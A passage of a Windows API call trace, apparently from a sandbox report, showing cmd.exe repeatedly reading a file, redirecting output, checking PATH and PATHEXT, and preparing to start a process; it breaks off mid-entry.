lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.758] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.758] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.758] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.758] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.758] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.758] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.758] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.758] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.758] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.758] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.758] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.760] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.760] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.760] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.760] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.760] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.760] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.760] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.760] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.760] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.760] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.760] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.762] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.762] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.762] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.762] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.762] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.762] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.762] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.762] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.762] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.762] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.762] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.764] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.764] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.764] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.764] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.764] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.764] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.764] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.764] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.764] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.764] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.783] FindClose (in: hFindFile=0x230830 | out: hFindFile=0x230830) returned 1 [0207.783] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0207.807] _close (_FileHandle=3) returned 0 [0207.807] GetConsoleTitleW (in: lpConsoleTitle=0x12f1f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.807] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0207.807] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0207.807] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.807] FindClose (in: hFindFile=0x230830 | out: hFindFile=0x230830) returned 1 [0207.808] FindClose (in: hFindFile=0x230830 | out: hFindFile=0x230830) returned 1 [0207.808] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0207.808] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0207.808] GetConsoleTitleW (in: lpConsoleTitle=0x12ef84, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.808] InitializeProcThreadAttributeList (in: lpAttributeList=0x12ee0c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12eed4 | out: lpAttributeList=0x12ee0c, lpSize=0x12eed4) returned 1 [0207.808] UpdateProcThreadAttribute (in: lpAttributeList=0x12ee0c, dwFlags=0x0, Attribute=0x60001, lpValue=0x12eecc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12ee0c, lpPreviousValue=0x0) returned 1 [0207.808] GetStartupInfoW (in: lpStartupInfo=0x12edc8 | out: lpStartupInfo=0x12edc8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, 